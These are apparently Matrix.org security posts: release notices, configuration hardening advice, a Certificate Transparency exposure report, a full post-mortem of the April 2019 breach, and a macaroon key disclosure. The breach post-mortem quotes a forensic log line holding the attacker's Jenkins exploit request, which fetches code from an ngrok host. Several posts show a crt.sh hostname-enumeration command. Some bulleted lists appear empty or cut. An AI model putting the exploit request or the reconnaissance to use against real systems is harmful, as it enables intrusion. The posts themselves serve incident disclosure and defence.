Folks, today we are releasing Synapse 1.15.2, a security release containing fixes for two separate problems. We are also putting out the second release candidate for the forthcoming Synapse 1.16, including the same fixes.
Firstly, we have fixed a bug in the implementation of the room state resolution algorithm which could cause users to be unexpectedly ejected from rooms (Synapse issue #7742).
Secondly, we have improved the security of pages served as part of the single sign-on (SSO) login flows to prevent clickjacking attacks. Thank you to Quentin Gliech for reporting this.
We are not aware of either of these vulnerabilities being exploited in the wild, but we recommend that administrators upgrade as soon as possible. Those on Synapse 1.15.1 or earlier should upgrade to Synapse 1.15.2, while those who have already upgraded to Synapse 1.16.0rc1 should upgrade to 1.16.0rc2.
Get the new releases from any of the usual sources mentioned at https://github.com/matrix-org/synapse/blob/master/INSTALL.md. 1.15.2 is on GitHub here, and 1.16.0rc2 is here.
Changelog for 1.15.2 follows:
Due to the two security issues highlighted below, server administrators are encouraged to update Synapse. We are not aware of these vulnerabilities being exploited in the wild.
A malicious homeserver could force Synapse to reset the state in a room to a small subset of the correct state. This affects all Synapse deployments which federate with untrusted servers. (96e9afe6)
HTML pages served via Synapse were vulnerable to clickjacking attacks. This predominantly affects homeservers with single-sign-on enabled, but all server administrators are encouraged to upgrade. (ea26e9a9)
This was reported by Quentin Gliech.
Hi all,
Over the course of today we've been made aware of folks port-scanning the general internet to discover private Matrix servers, looking for publicly visible room directories, and then trying to join rooms listed in them.
If you are running a Matrix server that is intended to be private, you must correctly configure your server to not expose its public room list to the general public - and also ensure that any sensitive rooms are invite-only (especially if the server is federated with the public Matrix network).
In Synapse, this means ensuring that the following options are set correctly in your homeserver.yaml:
# If set to 'false', requires authentication to access the server's public rooms
# directory through the client API. Defaults to 'true'.
#
#allow_public_rooms_without_auth: false
# If set to 'false', forbids any other homeserver to fetch the server's public
# rooms directory via federation. Defaults to 'true'.
#
#allow_public_rooms_over_federation: false
For private servers, you will almost certainly want to explicitly set these to false, meaning that the server's "public" room directory is hidden from the general internet and wider Matrix network.
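For illustration, this is roughly what the relevant section of homeserver.yaml looks like once explicitly locked down:

# Require a valid access token to query the room directory via the client API.
allow_public_rooms_without_auth: false

# Refuse to serve the room directory to other homeservers over federation.
allow_public_rooms_over_federation: false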
You can test whether your room directory is visible to arbitrary Matrix clients on the general internet by viewing a URL like https://sandbox.modular.im/_matrix/client/r0/publicRooms (but for your server). If it gives a "Missing access token" error, you are okay.
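For example, a quick check with curl might look roughly like this (substituting your own server for example.com); a locked-down server should return an M_MISSING_TOKEN error rather than a room list:

curl https://example.com/_matrix/client/r0/publicRooms
{"errcode":"M_MISSING_TOKEN","error":"Missing access token"}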
You can test whether your room directory is visible to arbitrary Matrix servers on the general internet by loading Riot (or similar) on another server, and entering the target server's domain name into the room directory's server selection box. If you can't see any rooms, then you are okay.
Relatedly, please ensure that any sensitive rooms are set to be "invite only" and room history is not world visible - particularly if your server is federated, or if it has public registration enabled. This stops random members of the public peeking into them (let alone joining them).
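If you would rather script this than click through each room's settings in Riot, join rules and history visibility are ordinary state events which can be set via the client-server API - a sketch using curl, where the server name, room ID and access token are placeholders:

curl -X PUT -H "Authorization: Bearer $ACCESS_TOKEN" -H "Content-Type: application/json" \
    -d '{"join_rule": "invite"}' \
    "https://example.com/_matrix/client/r0/rooms/%21yourroomid%3Aexample.com/state/m.room.join_rules"

curl -X PUT -H "Authorization: Bearer $ACCESS_TOKEN" -H "Content-Type: application/json" \
    -d '{"history_visibility": "invited"}' \
    "https://example.com/_matrix/client/r0/rooms/%21yourroomid%3Aexample.com/state/m.room.history_visibility"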
Relying on security-by-obscurity is a very bad idea: all it takes is for someone to scan the whole internet for Matrix servers and then try to join (say) #finance on each discovered domain (either by signing up on that server or by trying to join over federation) to cause problems.
Finally, if you don't want the general public reading your room directory, please also remember to turn off public registration on your homeserver. Otherwise even with the changes above, if randoms can sign up on your server to view & join rooms then all bets are off.
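In Synapse, public registration is controlled by a single option in homeserver.yaml (shown here for completeness):

# Don't let random members of the public create accounts on this server.
enable_registration: false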
We'll be rethinking the security model of room directories in future (e.g. whether to default them to being only visible to registered users on the local server, or whether to replace per-server directories with per-community directories with finer grained access control, etc) - but until this is sorted, please heed this advice.
If you have concerns about randoms having managed to discover or join rooms which should have been private, please contact [email protected].
Hi all,
This morning (06:11 UTC) it became apparent through mails to [email protected] that a security researcher was working through the TLS Certificate Transparency logs for *.matrix.org, *.riot.im and *.modular.im to identify and try to access non-public services run by New Vector (the company formed by the original Matrix team, which hosts *.matrix.org on behalf of the Matrix.org Foundation, and develops Riot and runs the https://modular.im hosting service).
Certificate Transparency (CT) is a feature of the TLS ecosystem which lets you see which public certificates have been created and signed by given authorities - intended to help identify and mitigate malicious certificates. This means that the DNS name of any host with a dedicated public TLS certificate (i.e. not using a wildcard certificate) is visible to the general public.
In practice, this revealed a handful of internal-facing services using dedicated public TLS certificates which were accessible to the general internet - some of which should have been locked down to be accessible only from our internal network.
Specifically:
kibana.ap-southeast-1.k8s.i.modular.im - a Kibana deployment for a new experimental Modular cluster which is being set up in SE Asia. The Kibana is in the middle of being deployed, and was exposed without authentication during deployment due to a firewall & config error. However, it is not a production system and carries no production traffic or user data (it was just being used for experimentation for hypothetical geography-specific Modular deployments). We firewalled this off at 07:53 UTC, are doing analysis to confirm there was no further compromise, and will then rebuild the cluster (having fixed the firewall config error so that it cannot repeat).

Additionally, certain historical Modular homeservers & Riots (from before we switched to using wildcard certs, or where we’ve created a custom LetsEncrypt certificate for the server) are named in the CT logs - thus leaking the server’s name (which is typically public anyway in that server’s Matrix IDs if the server is federated).
We’re working through the services whose names were exposed checking for any other issues, but other than the non-production SE Asia Kibana instance we are not aware of problems resulting from this activity.
Meanwhile, we’ll be ensuring that semi-internal services are only exposed on our internal network in future, and that Modular server names are not exposed by CT logs where possible.
TL;DR: You can list all the public non-wildcard TLS certs for a given domain by looking somewhere like https://crt.sh/?q=%25.matrix.org. This lets you find internal-sounding services to try to attack. In practice no production services were compromised, and most of our internal services are correctly firewalled from the public internet. However, we’re reviewing the IP locking for ones in the grey zone (and preventing the bug which caused an experimental Kibana to be exposed without auth).
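For the curious, the same lookup can be scripted - a sketch assuming crt.sh’s JSON interface (the output=json parameter and the name_value field are as we understand crt.sh today, and may change):

curl -s 'https://crt.sh/?q=%25.matrix.org&output=json' | jq -r '.[].name_value' | sort -u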
We’d like to thank Linda Lapinlampi for notifying us about this. We’d also like to remind everyone that we operate a Security Disclosure Policy (SDP) and Hall of Fame at https://matrix.org/security-disclosure-policy/ which is designed to protect innocent users from being hurt by security issues - everyone: please consider disclosing issues responsibly to us as per the SDP.
Hi all,
On April 11th we dealt with a major security incident impacting the infrastructure which runs the Matrix.org homeserver - specifically: removing an attacker who had gained superuser access to much of our production network. We provided updates at the time as events unfolded on April 11 and 12 via Twitter and our blog, but in this post we’ll try to give a full analysis of what happened and, critically, what we have done to avoid this happening again in future. Apologies that this has taken several weeks to put together: the time-consuming process of rebuilding after the breach has had to take priority, and we also wanted to get the key remediation work in place before writing up the post-mortem.
Firstly, please understand that this incident was not due to issues in the Matrix protocol itself or the wider Matrix network - and indeed everyone who wasn’t on the Matrix.org server should have barely noticed. If you see someone say “Matrix got hacked”, please politely but firmly explain to them that the servers which run the oldest and biggest instance got compromised via a Jenkins vulnerability and bad ops practices, but the protocol and network itself was not impacted. This is not to say that the Matrix protocol itself is bug free - indeed we are still in the process of exiting beta (delayed by this incident), but this incident was not related to the protocol.
Before we get stuck in, we would like to apologise unreservedly to everyone impacted by this whole incident. Matrix is an altruistic open source project, and our mission is to try to make the world a better place by providing a secure decentralised communication protocol and network for the benefit of everyone; giving users total control back over how they communicate online.
In this instance, our focus on trying to improve the protocol and network came at the expense of investing sysadmin time around the legacy Matrix.org homeserver and project infrastructure which we provide as a free public service to help bootstrap the Matrix ecosystem, and we paid the price.
This post will hopefully illustrate that we have learnt our lessons from this incident and will not be repeating them - and indeed intend to come out of this episode stronger than you can possibly imagine :)
Meanwhile, if you think that the world needs Matrix, please consider supporting us via Patreon or Liberapay. Not only will this make it easier for us to invest in our infrastructure in future, it also makes projects like Pantalaimon (E2EE compatibility for all Matrix clients/bots) possible, which are effectively being financed entirely by donations. The funding we raised in Jan 2018 is not going to last forever, and we are currently looking into new longer-term funding approaches - for which we need your support.
Finally, if you happen across security issues in Matrix or matrix.org’s infrastructure, please please consider disclosing them responsibly to us as per our Security Disclosure Policy, in order to help us improve our security while protecting our users.
Firstly, some context about Matrix.org’s infrastructure. The public Matrix.org homeserver and its associated services run across roughly 30 hosts, spanning the actual homeserver, its DBs, load balancers, intranet services, website, bridges, bots, integrations, video conferencing, CI, etc. We provide it as a free public service to the Matrix ecosystem to help bootstrap the network and make life easier for first-time users.
The deployment which was compromised in this incident was mainly set up back in Aug 2017 when we vacated our previous datacenter at short notice, thanks to our funding situation at the time. Previously we had been piggybacking on the well-managed production datacenters of our previous employer, but during the exodus we needed to move as rapidly as possible, and so we spun up a bunch of vanilla Debian boxes on UpCloud and shifted over services as simply as we could. We had no dedicated ops people on the project at that point, so this was a subset of the Synapse and Riot/Web dev teams putting on ops hats to rapidly get set up, whilst also juggling the daily fun of keeping the ever-growing Matrix.org server running and trying to actually develop and improve Matrix itself.
In practice, this meant that some corners were cut that we expected to be able to come back to and address once we had dedicated ops staff on the team. For instance, we skipped setting up a VPN for accessing production in favour of simply SSHing into the servers over the internet. We also went for the simplest possible config management system: checking all the configs for the services into a private git repo. We also didn’t spend much time hardening the default Debian installations - for instance, the default image allows root access via SSH and allows SSH agent forwarding, and the config wasn’t tweaked. This is particularly unfortunate, given our previous production OS (a customised Debian variant) had got all these things right - but the attitude was that because we’d got this right in the past, we’d be easily able to get it right in future once we fixed up the hosts with proper configuration management etc.
Separately, we also made the controversial decision to maintain a public-facing Jenkins instance. We did this deliberately, despite the risks associated with running a complicated publicly available service like Jenkins, but reasoned that as a FOSS project, it is imperative that we are transparent and that continuous integration results and artefacts are available and directly visible to all contributors - whether they are part of the core dev team or not. So we put Jenkins on its own host, gave it some macOS build slaves, and resolved to keep an eye open for any security alerts which would require an upgrade.
Lots of stuff then happened over the following months - we secured funding in Jan 2018; the French Government began talking about switching to Matrix around the same time; the pressure of getting Matrix (and Synapse and Riot) out of beta and to a stable 1.0 grew ever stronger; the challenge of handling the ever-increasing traffic on the Matrix.org server soaked up more and more time, and we started to see our first major security incidents (a major DDoS in March 2018, mitigated by shielding behind Cloudflare, and various attacks on the more beta bits of Matrix itself).
The good news was that funding meant that in March 2018 we were able to hire a fulltime ops specialist! By this point, however, we had two new critical projects in play to try to ensure long-term funding for the project via New Vector, the startup formed in 2017 to hire the core team: firstly, to build out Modular.im as a commercial-grade Matrix SaaS provider, and secondly, to support France in rolling out their massive Matrix deployment as a flagship example of how Matrix can be used. And so, for better or worse, the brand new ops team was given a very clear mandate: to largely ignore the legacy datacenter infrastructure, and instead focus exclusively on building entirely new, pro-grade infrastructure for Modular.im and France, with the expectation of eventually migrating Matrix.org itself into Modular when ready (or just turning off the Matrix.org server entirely, once we have account portability).
So we ended up with two production environments; the legacy Matrix.org infra, whose shortcomings continued to linger and fester off the radar, and separately all the new Modular.im hosts, which are almost entirely operationally isolated from the legacy datacenter; whose configuration is managed exclusively by Ansible, and have sensible SSH configs which disallow root login etc. With 20:20 hindsight, the failure to prioritise hardening the legacy infrastructure is quite a good example of the normalisation of deviance - we had gotten too used to the bad practices; all our attention was going elsewhere; and so we simply failed to prioritise getting back to fix them.
The first evidence of things going wrong was a tweet from JaikeySarraf, a security researcher who kindly reached out via DM at the end of Apr 9th, after stumbling across our Jenkins via Google, to warn us that it was outdated. In practice, our Jenkins was running version 2.117 with plugins which had been updated on an ad hoc basis, and we had indeed missed the security advisory (partially because most of our CI pipelines had moved to TravisCI, CircleCI and Buildkite), and so on Apr 10th we updated the Jenkins and investigated to see if any vulnerabilities had been exploited.
In this process, we spotted an unrecognised SSH key in /root/.ssh/authorized_keys2 on the Jenkins build server. This was suspicious both because the key was not in our key DB and because it was stored in the obscure authorized_keys2 file (a legacy location from back when OpenSSH transitioned from SSH1 to SSH2). Further inspection showed that 19 hosts in total had the same key present in the same place.
At this point we started doing forensics to understand the scope of the attack and plan the response, as well as taking snapshots of the hosts to protect data in case the attacker realised we were aware and attempted to vandalise or cover their tracks. Findings were:
matrix.org:443 151.34.xxx.xxx - - [13/Mar/2019:18:46:07 +0000] "GET /jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/[email protected](disableChecksums=true)%[email protected](name=%27orange.tw%27,%20root=%27http://5f36xxxx.ngrok.io/jenkins/%27)%[email protected](group=%27tw.orange%27,%20module=%270x3a%27,%20version=%27000%27)%0Aimport%20Orange; HTTP/1.1" 500 6083 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
/usr/share/bsd-mail/shroot).

By around 2am on Apr 11th we felt that we had sufficient visibility on the attacker’s behaviour to be able to do a first pass at evicting them by locking down SSH, removing their keys, and blocking as much network traffic as we could.
We then started a full rebuild of the datacenter on the morning of Apr 11th, given that the only responsible course of action when an attacker has acquired root is to salt the earth and start over afresh. This meant rotating all secrets; isolating the old hosts entirely (including ones which appeared to not have been compromised, for safety), spinning up entirely new hosts, and redeploying everything from scratch with the fresh secrets. The process was significantly slowed down by colliding with unplanned maintenance and provisioning issues in the datacenter provider and unexpected delays spent waiting to copy data volumes between datacenters, but by 1am on Apr 12th the core matrix.org server was back up, and we had enough of a website up to publish the initial security incident blog post. (This was actually static HTML, faked by editing the generated WordPress content from the old website. We opted not to transition any WordPress deployments to the new infra, in a bid to keep our attack surface as small as possible going forwards).
Given the production database had been accessed, we had no choice but to drop all access_tokens for matrix.org to stop the attacker accessing user accounts, causing a forced logout for all users on the server. We also recommended all users change their passwords, given the salted & hashed (4096 rounds of bcrypt) passwords had likely been exfiltrated.
At about 4am we had enough of the bare necessities back up and running to pause for sleep.
At around 7am, we were woken up to the news that the attacker had managed to replace the matrix.org website with a defacement (as per https://github.com/vector-im/riot-web/issues/9435). It looks like the attacker didn’t think we were being transparent enough in our initial blog post, and wanted to make it very clear that they had access to many hosts, including the production database, and had indeed exfiltrated password hashes. Unfortunately it took a few hours for the defacement to get on our radar, as our monitoring infrastructure hadn’t yet been fully restored and the normal paging infrastructure wasn’t back up (we now have emergency-emergency-paging for this eventuality).
On inspection, it transpired that the attacker had not compromised the new infrastructure, but had used Cloudflare to repoint the DNS for matrix.org to a defacement site hosted on GitHub. Now, as part of rotating the secrets which had been compromised via our configuration repositories, we had of course rotated the Cloudflare API key (used to automate changes to our DNS) during the rebuild on Apr 11. When you log into Cloudflare, you are presented with a list of accounts: the top one is your personal account, and the bottom one is an admin role account. To rotate the admin API key, we clicked on the admin account to log in as the admin, and then went to the Profile menu, found the API keys and hit the Change API Key button.
Unfortunately, when you do this, it turns out that the API Key it changes is your personal one, rather than the admin one. As a result, in our rush we thought we’d rotated the admin API key, but we hadn’t, thus accidentally enabling the defacement.
To flush out the defacement we logged in directly as the admin user and changed the API key, pointed the DNS back at the right place, and continued on with the rebuild.
The goal of the rebuild has been to get all the higher priority services back up rapidly - whilst also ensuring that good security practices are in place going forwards. In practice, this meant making some immediate decisions about how to ensure the new infrastructure did not suffer the same issues and fate as the old. Firstly, we ensured the most obvious mistakes that made the breach possible were mitigated:
Then, whilst reinstating services on the new infra, we opted to review everything being installed for security risks, replacing with securer alternatives if needed, even if it slowed down the rebuild. Particularly, this meant:
Now, while we restored the main synapse (homeserver), sydent (identity server), sygnal (push server), databases, load balancers, intranet and website on Apr 11, it’s important to understand that there were over 100 other services running on the infra - which is why it is taking a while to get full parity with where we were before.
In the interest of transparency (and to try to give a sense of scale of the impact of the breach), here is the public-facing service list we restored, showing priority (1 is top, 4 is bottom) and the % restore status as of May 4th:
Apologies again that it took longer to get some of these services back up than we’d have preferred (and that there are still a few pending). Once we got the top priority ones up, we had no choice but to juggle the remainder alongside remediation work, other security work, and actually working on Matrix(!), whilst ensuring that the services we restored were being restored securely.
Once the majority of the P1 and P2 services had been restored, on Apr 24 we held a formal retrospective for the team on the whole incident, which in turn kicked off a full security audit over the entirety of our infrastructure and operational processes.
We’d like to share the resulting remediation plan in as much detail as possible, in order to show the approach we are taking, and in case it helps others avoid repeating the mistakes of our past. Inevitably we’re going to have to skip over some of the items, however - after all, remediations imply that there’s something that could be improved, and for obvious reasons we don’t want to dig into areas where remediation work is still ongoing. We will aim to provide an update on these once ongoing work is complete, however.
We should also acknowledge that after being removed from the infra, the attacker chose to file a set of GitHub issues on Apr 12 to highlight some of the security issues they had taken advantage of during the breach. Their actions matched the findings from our forensics on Apr 10, and their suggested remediations aligned with our plan.
We’ve split the remediation work into the following domains.
Some of the biggest issues exposed by the security breach concerned our use of SSH, which we’ll take in turn:
SSH agent forwarding is a beguilingly convenient mechanism which allows a user to ‘forward’ access to their private SSH keys to a remote server whilst logged in, so they can in turn access other servers via SSH from that server. Typical uses are to make it easy to copy files between remote servers via scp or rsync, or to interact with a SCM system such as Github via SSH from a remote server. Your private SSH keys end up available for use by the server for as long as you are logged into it, letting the server impersonate you.
The common wisdom on this tends to be something like: "Only use agent forwarding when connecting to trusted hosts". For instance, GitHub's guide to using SSH agent forwarding says:

Warning: You may be tempted to use a wildcard like Host * to just apply this setting (ForwardAgent: yes) to all SSH connections. That's not really a good idea, as you'd be sharing your local SSH keys with every server you SSH into. They won't have direct access to the keys, but they will be able to use them as you while the connection is established. You should only add servers you trust and that you intend to use with agent forwarding.
As a result, several of the team doing ops work had set Host *.matrix.org ForwardAgent: yes in their ssh client configs, thinking "well, what can we trust if not our own servers?"
This was a massive, massive mistake.
If there is one lesson everyone should learn from this whole mess, it is: SSH agent forwarding is incredibly unsafe, and in general you should never use it. Not only can malicious code running on the server as that user (or root) hijack your credentials, but your credentials can in turn be used to access hosts behind your network perimeter which might otherwise be inaccessible. All it takes is for someone to have snuck malicious code onto your server, waiting for you to log in with a forwarded agent, and boom - even if it was just a one-off ssh -A.
Our remediations for this are to stop using SSH agent forwarding entirely, and instead use SSH’s jump-host support where we previously relied on forwarding to hop between hosts or copy files - e.g. ssh -J $host, or rsync -e "ssh -J $host" (see the sketch below).
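As a sketch, the ~/.ssh/config equivalent is to drop ForwardAgent and use ProxyJump (available in OpenSSH 7.3+), so that private keys never leave your own machine (host names here are purely illustrative):

Host *.prod.example.com
    # Never expose the local agent to remote hosts
    ForwardAgent no
    # Hop via a bastion instead; each hop authenticates against your local agent
    ProxyJump bastion.example.com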
Another approach could be to allow forwarding, but configure your SSH agent to prompt whenever a remote app tries to access your keys. However, not all agents support this (OpenSSH’s does via ssh-add -c, but gnome-keyring for instance doesn’t), and also it might still be possible for a hijacker to race with the valid request to hijack your credentials.
Needless to say, SSH is no longer exposed to the general internet. We are rolling out a VPN as the main access route into the dev network, with SSH bastion hosts as the only access point into production, using SSH keys to restrict access to be as minimal as possible.
Another major problem was that individual SSH keys gave very broad access. We have gone through and ensured that SSH keys grant the least privilege required by the users in question; in particular, root login should not be available over SSH.
A typical scenario where users might end up with unnecessary access to production is developers who simply want to push new code or check its logs. We are mitigating this by switching over to using continuous deployment infrastructure everywhere, rather than developers having to actually SSH into production. For instance, the new matrix.org blog is continuously deployed into production by Buildkite from GitHub without anyone needing to SSH anywhere. Similarly, logs should be available to developers from a logserver in real time, without having to SSH into the actual production host. We’ve already been experimenting internally with Sentry for this.
Relatedly, we’ve also shifted to requiring multiple SSH keys per user (per device, and for privileged / unprivileged access), giving us finer-grained control over locking down their permissions, revoking them, etc. (We had actually already started this process, and while it didn’t help prevent the attack, it did assist with forensics.)
We are rolling out two-factor authentication for SSH to ensure that even if keys are compromised (e.g. via forwarding hijack), the attacker needs to have also compromised other physical tokens in order to successfully authenticate.
We’ve decided to stop users from being able to directly manage their own SSH keys in production via ~/.ssh/authorized_keys (or ~/.ssh/authorized_keys2, for that matter) - we can see no benefit from letting non-root users set keys. Instead, keys for all accounts are managed exclusively by Ansible via /etc/ssh/authorized_keys/$account (using sshd’s AuthorizedKeysFile /etc/ssh/authorized_keys/%u directive).
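A sketch of the corresponding sshd_config directives (illustrative rather than our exact configuration):

# Keys live in a root-owned location managed by Ansible, not in users' home dirs
AuthorizedKeysFile /etc/ssh/authorized_keys/%u
# No direct root logins over SSH
PermitRootLogin no
# Refuse agent forwarding server-side as well
AllowAgentForwarding no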
If we’d had sufficient monitoring of the SSH configuration, the breach could have been caught instantly. We are addressing this by managing the keys exclusively via Ansible (so any unexpected change stands out), and by improving our intrusion detection in general.
Similarly, we are working on tracking changes and additions to other credentials (and enforcing their complexity).
If we’d gone through reviewing the default sshd config when we set up the datacenter in the first place, we’d have caught several of these failure modes at the outset. We’ve now done so (as per above).
We’d like to recommend that OpenSSH packages start shipping with secure-by-default configurations, as a number of the old options just don’t need to exist on most newly provisioned machines.
As mentioned in the History section, the legacy network infrastructure effectively grew organically, without really having a core network or a good split between different production environments.
We are addressing this by:
We’re also running most services in containers by default going forwards (previously it was a bit of a mix of running unix processes, VMs, and occasional containers), providing an additional level of namespace isolation.
Needless to say, this particular breach would not have happened had we kept the public-facing Jenkins patched (although there would of course still have been scope for a 0-day attack).
Going forwards, we are establishing a formal regular process for deploying security updates rather than relying on spotting security advisories on an ad hoc basis. We are now also setting up regular vulnerability scans against production so we catch any gaps before attackers do.
Aside from our infrastructure, we’re also extending the process of regularly checking for security updates to also checking for outdated dependencies in our distributed software (Riot, Synapse, etc) too, given the discipline to regularly chase outdated software applies equally to both.
Moving all our machine deployment and configuration into Ansible allows this to be a much simpler task than before.
There’s obviously a lot we need to do in terms of spotting future attacks as rapidly as possible. Amongst other strategies, we’re working on real-time log analysis for aberrant behaviour.
There is much we have learnt from managing an incident at this scale. The main highlights taken from our internal retrospective are:
One of the major flaws once the attacker was in our network was that our internal configuration git repo was cloned on most accounts on most servers, containing within it a plethora of unencrypted secrets. Config would then get symlinked from the checkout to wherever the app or OS needed it.
This is bad not only in terms of leaving unencrypted secrets (database passwords, API keys etc) lying around everywhere, but also in terms of making it hard to automatically maintain configuration and to spot unauthorised configuration changes.
Our solution is to switch all configuration management, from the OS upwards, to Ansible (which we had already established for Modular.im), using Ansible vaults to store the encrypted secrets. It’s unfortunate that we had already done the work for this (and even had been giving talks at Ansible meetups about it!) but had not yet applied it to the legacy infrastructure.
None of this would have happened had we been more disciplined in finishing off the temporary infrastructure from back in 2017. As a general point, we should try and do it right the first time - and failing that, assign responsibility to someone to update it and assign responsibility to someone else to check. In other words, the only way to dig out of temporary measures like this is to project manage the update or it will not happen. This is of course a general point not specific to this incident, but one well worth reiterating.
One of the most unfortunate mistakes highlighted by the breach is that the signing keys for the Synapse debian repository, Riot debian repository and Riot/Android releases on the Google Play Store had ended up on hosts which were compromised during the attack. This is obviously a massive fail, and is a case of the geo-distributed dev teams prioritising the convenience of a near-automated release process without thinking through the security risks of storing keys on a production server.
Whilst the keys were compromised, none of the packages that we distribute were tampered with. However, the impact on the project has been high - particularly for Riot/Android, as we cannot allow the risk of an attacker using the keys to sign and somehow distribute malicious variants of Riot/Android, and Google provides no means of recovering from a compromised signing key beyond creating a whole new app and starting over. Therefore we have lost all our ratings, reviews and download counts on Riot/Android and started over. (If you want to give the newly released app a fighting chance despite this setback, feel free to give it some stars on the Play Store). We also revoked the compromised Synapse & Riot GPG keys and created new ones (and published new instructions for how to securely set up your Synapse or Riot debian repos).
In terms of remediation, designing a secure build process is surprisingly hard, particularly for a geo-distributed team. What we have landed on is as follows:
Alternatives here included:
The main change in our dev and CI infrastructure is to move from Jenkins to Buildkite. The latter has been serving us well for Synapse builds over the last few months, and has now been extended to serve all the main CI pipelines that Jenkins was providing. Buildkite works by orchestrating jobs on an elastic pool of CI workers we host in our own AWS, and so far has done so quite painlessly.
The new pipelines have been set up so that where CI needs to push artefacts to production for continuous deployment (e.g. riot.im/develop), it does so by poking production via HTTPS to trigger production to pull the artefact from CI, rather than pushing the artefact via SSH to production.
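As a sketch of the pattern (hosts, endpoints and paths below are purely illustrative): CI notifies production over HTTPS, and production then fetches the artefact itself, so no CI worker ever holds SSH credentials for production.

# CI side: poke production to say a new artefact is ready
curl -fsS -X POST -H "Authorization: Bearer $DEPLOY_HOOK_TOKEN" https://deploy.example.com/hooks/riot-develop

# Production side (run by the hook handler): pull the artefact from CI over HTTPS and unpack it
curl -fsSL -o /tmp/riot-develop.tar.gz https://ci.example.com/artifacts/riot-develop/latest.tar.gz
tar -xzf /tmp/riot-develop.tar.gz -C /srv/riot/develop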
Other than CI, our strategy is:
Another thing that the breach made painfully clear is that we log too much. While there’s not much evidence of the attacker going spelunking through any Matrix service log files, the fact is that whilst developing Matrix we’ve kept logging on matrix.org relatively verbose to help with debugging. There’s nothing more frustrating than trying to trace through the traffic for a bug only to discover that logging didn’t pick it up.
However, we can still improve our logging and PII-handling substantially:
Meanwhile, in Matrix itself we already are very mindful of handling PII (c.f. our privacy policies and GDPR work), but there is also more we can do, particularly:
Hopefully this gives a comprehensive overview of what happened in the breach, how we handled it, and what we are doing to protect against this happening in future.
Again, we’d like to apologise for the massive inconvenience this caused to everyone caught in the crossfire. Thank you for your patience and for sticking with the project whilst we restored systems. And while it is very unfortunate that we ended up in this situation, we should at least be coming out of it much stronger, particularly in terms of infrastructure security. We’d also like to particularly thank Kade Morton for providing independent review of this post and our remediations, everyone who reached out with #hugops during the incident (it was literally the only positive thing we had on our radar), and finally those of the Matrix team who hauled ass to rebuild the infrastructure, as well as those who doubled down meanwhile to keep the rest of the project on track.
On which note, we’re going to go back to building decentralised communication protocols and reference implementations for a bit... Emoji reactions are on the horizon (at last!), as is Message Editing, RiotX/Android and a host of other long-awaited features - not to mention finally releasing Synapse 1.0. So: thanks again for flying Matrix, even during this period of extreme turbulence and, uh, hijack. Things should mainly be back to normal now and for the foreseeable.
Given the new blog doesn't have comments yet, feel free to discuss the post over at HN.

Hi all,
Over the last few weeks we’ve ended up getting a lot of attention from the security research community, which has been incredibly useful and massively appreciated in terms of contributions to improve the security of the reference Matrix implementations.
We’ve also set up an official Security Disclosure Policy to explain the process of reporting security issues to us safely via responsible disclosure - including a Hall of Fame to credit those who have done so. (Please mail [email protected] to remind us if we’ve forgotten you!).
Since we published the Hall of Fame yesterday, we’ve already been getting new entries and so we’re doing a set of security releases today to ensure they are mitigated asap. Unfortunately the work around this means that we’re running late in publishing the post mortem of the Apr 11 security incident - we are trying to get that out as soon as we can.
Sydent 1.0.3 has three security fixes:
If you are running Sydent as an identity server, you should update as soon as possible from https://github.com/matrix-org/sydent/releases/v1.0.3. We are not aware of any of these issues having been exploited maliciously in the wild.
Synapse 0.99.3.1 is a security update for two fixes:
You can update from https://github.com/matrix-org/synapse/releases or similar as normal. We are not aware of any of these issues having been exploited maliciously in the wild.
(Synapse 0.99.3.2 was released shortly afterwards to fix a non-security issue with the Debian packaging)
Riot/Android has an important security fix which shipped over the course of the last week in various versions of the app:
The fix for this shipped on F-Droid since 0.8.28a, and on the Play Store, the fix is present in both v0.9.0 (the first version of the re-published Riot app) and v0.8.99 (the last version of the old Riot app, which told everyone to reinstall). Other forks of Riot which we’re aware of have also been informed and should be updated.
If you haven’t already updated, please do so now.
On Thursday Jan 10th we released a Critical Security Update (Synapse 0.34.0.1/0.34.1.1), which fixes a serious security bug in Synapse 0.34.0 and earlier. Many deployments have now upgraded to 0.34.0.1 or 0.34.1.1, and we now consider it appropriate to disclose more information about the issue, to provide context and encourage the remaining affected servers to upgrade as soon as possible.
In Synapse 0.11 (Nov 2015) we added a configuration parameter called “macaroon_secret_key” which relates to our use of macaroons in authentication. Macaroons are authentication tokens which must be signed by the server which generates them, to prevent them being forged by attackers. “macaroon_secret_key” defines the key which is used for this signature, and it must therefore be kept secret to preserve the security of the server.
If the option is not set, Synapse will attempt to derive a secret key from other secrets specified in the configuration file. However, in all versions of Synapse up to and including 0.34.0, this process was faulty and a predictable value was used instead.
So if your homeserver.yaml does not contain a macaroon_secret_key, you need to upgrade to 0.34.1.1, 0.34.0.1 or Debian 0.34.0-3~bpo9+2 immediately to prevent the risk of account hijacking. The vulnerability affects any Synapse installation which does not have a macaroon_secret_key setting. For example, the packages from Matrix.org, Debian and Ubuntu include a configuration file without an explicit macaroon_secret_key, so installations using those default configs must upgrade. Anyone who hasn't updated their config since Nov 2015, or who carried their config over from the Debian/Ubuntu packages, is likely also affected.
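For reference, a sketch of what setting the option explicitly looks like in homeserver.yaml (the generation command is just one way of producing a suitably long random value, and the value shown is a placeholder):

# Generate a value with e.g.: openssl rand -hex 32
macaroon_secret_key: "<long random string, kept secret>"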
We are not aware of this vulnerability being exploited in the wild, but if you are running an affected server it may still be wise to check your Synapse's user_ips database table for any unexpected access to your server's accounts. You could also check your accounts' device lists (shown under Settings in Riot) for unexpected devices, although this is less reliable, as an attacker could cover their tracks by removing unexpected devices.
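A sketch of such a check against the Synapse database, assuming the long-standing user_ips columns (user_id, ip, user_agent, last_seen); adjust if your schema differs:

-- Most recent client IPs and user agents seen per account
SELECT user_id, ip, user_agent, last_seen
FROM user_ips
ORDER BY last_seen DESC;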
We'll publish a full post-mortem of the issue once we are confident that most affected servers have been upgraded.
We'd like to apologise for the inconvenience caused by this - especially to folks who upgraded since Friday and were in practice not affected. Due to the nature of the issue, we wanted to minimise the details we shared until people had had a chance to upgrade. We also did not follow a planned disclosure procedure because Synapse 0.34.1 already unintentionally disclosed the existence of the bug by fixing it (causing the logout bug for affected users which led us to pull the original Synapse 0.34.1 release).
On the plus side, we are approaching the end of beta for Synapse, and going forwards hope to see much better stability and security across the board.
Thanks again for your patience,
The Matrix.org Team